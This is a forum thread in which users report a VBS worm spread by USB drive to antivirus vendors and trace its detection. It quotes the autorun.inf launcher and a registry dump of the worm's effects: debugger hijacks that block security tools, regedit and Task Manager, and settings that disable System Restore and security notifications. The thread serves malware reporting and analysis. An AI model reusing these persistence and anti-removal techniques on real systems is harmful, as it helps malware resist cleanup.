New VBS virus,and OMG it is some kind of hard to see it ;)

Viruses and worms
1

Yesterday me and my friends have to study for programming test

“matlab2010” so we come to my home and excute all simulinks and

GUIs things.After that one of my friend ask me to copy dr.web cure

it to his flash memory,so I inserted it in my 7 PC and copy dr.web

cure it and other programs by the way i found an autorun.inf file

in the flash memory I open it and found the following code:


[autorun]
shellexecute=Wscript.exe /e:vbs Thambs.db

What is that I notice the thumbs file but it is a normal file

created by explorer when you open folders that contain images,that

what I thought that second so normally I copy the files to my flash

and today I analyzed samples on my real testing machine I was

shocked to see a obsurfcated code of vbs in the file it was not a

“Thumbs.db” BUT “Thambs.db”,avast dont detect it so i edit the text

and try to create a new file so avast at that point detect it as
VBS:Malware-Gen
What make me sad that niether avast nor norton detect the original

file as a virus so in my sandbox the virus loaded and worked with

no detection from avast,on the contrary avast scan the created

autorun.inf file a lot and find nothing ,Since the virus is not

that technology advanced it creates autorun.inf every second"or

more"in the fixed and usb drivers c: d: e: …
The file has been sent to avast with link to this thread by email

and by chest function.

2

Good way to learn things, SH. But, be careful you might infect your computer.

3

Those things run in my blood and when you have 4 pc you dont even think about infections,I wish avast add detection for that.
By the way I have a suspect about my blood may it is C++ not B- :wink:

4

lol this makes me want to get a computer that isnt good for much. and download different kinds of viruses on it(unpluging the network cable after its done). see how they work and what they do. use an antiviruses probably to get rid of it. or just wipe the whole thing and start over. thats a good way to learn id say. im also gonna test how well antiviruses spot them.

5

I update avast and no detection yet.
Other companies add a signature. :frowning:
Merry Christmas
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293278193

6

Norman analysis will add detection

autorun.inf : Processed - INF/Autorun.II
Thambs.db : Processed - Slogod.B

7

Thanks,BUT still no detection from avast :frowning:

8

13/43:BUT NOT AVAST
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293376095

9

and this is the result from Avira

26000665 autorun.inf 106 Byte CLEAN 26000666 Thambs.db 78.63 KB CLEAN

So what to belive ?

10

Believe what you see in my image or what you can see from your analyzing I dont know if you are VBS geek but any script programmer could see the bad payload in the file.
Until now no detection and it 's autorun file also couldnot be detected by avast

11

2 Days and no detection yet :frowning: :o
The sample is not an easy to detect by normal user so please publish a signature for it,thanks.

12

This file should be detected as malware, after run the autorun as an autorun in the drive, it did almost all basic action of a malware like disable task manager, disable windows update etc

This is exactly what I did:

  • Extract the archive, copy those files (autorun.inf and Thambs.db) in root of C: (I tried on both Windows XP SP3 and Windows 7 Ultimate, so it must works in other windows too)
  • Log-off and login or restart explorer.exe
  • Double click on C: (If you right click, you should see you have Autorun in drive now, you know better than me :wink: )
  • Now Windows update will be disable (Windows Security Center will alert you), you cannot open Task Manager, neither regedt32.exe and…

This is part of registry change after run:

[HKEY_USERS\hive\machine\software\Classes\Vbsfile]
"FriendlyTypeName"="Fichier de la base de données"

[HKEY_USERS\hive\machine\software\Classes\Vbsfile\DefaultIcon]
@="shell32.dll,-154"

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Ouvrir avec...]

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Ouvrir avec...\command]
@="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Scan with Anti-Trojan]

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Scan with Anti-Trojan\command]
@="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001

[HKEY_USERS\hive\machine\software\Policies\Microsoft\Windows\Installer]
"LimitSystemRestoreCheckpointing"=dword:00000001

[HKEY_USERS\hive\machine\software\microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000001
"FirewallDisableNotify"=dword:00000001
"FirewallOverride"=dword:00000001

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutorunRemover.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\GenProc.bat]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\GenProc.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\HJTInstall.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\LaunchU3.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Opera.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rmvtrjan.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safari.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Startup CP.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trjscan.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\avant.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\combofix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\flock.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\malwarebytes-anti-malware_malwarebytes_anti-malware_1.44_francais_215092.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mvyA.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\navigator.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\usbfix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000001
13

One file is detected by avast! now

VirusTotal - autorun.inf - 9/43
http://www.virustotal.com/file-scan/report.html?id=50b555b8aa1cb3a2d75354f9b95da8a5bfd19c1ad6cb29ee4b96594654134ad0-1293488028

VirusTotal - Thambs.db - 16/43
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293488161

14

Deciding about Add Autorun.inf is not easy, logically it’s just a text which ‘call’ malware, but in action without definition for that it’s difficult for newbie to clean their computer (e.g. solve Autorun in their USB drive or partition).
Anyway, it’s a command which call a bad thing and never can be used for good, so better detect it!

15

After contacting Avira with a few number of mails:

Thank you for your recent inquiry.

We found a new virus in the attachment you have sent us.
The pattern recognition will be integrated in one of our next updates.
The pattern recognition of the virus will be detected as VBS/Flesh.A.

We thank you for your assistance.

16

@ Omid Farhang & Pondus:
Thank you both for your work yesterday milos PM ed me and he say the virus will be detected now,So thank you every body It is not that easy to remove by a newbie or even a medium user.

@Omid:
From where you got your sample? ???

Best regards.

superhacker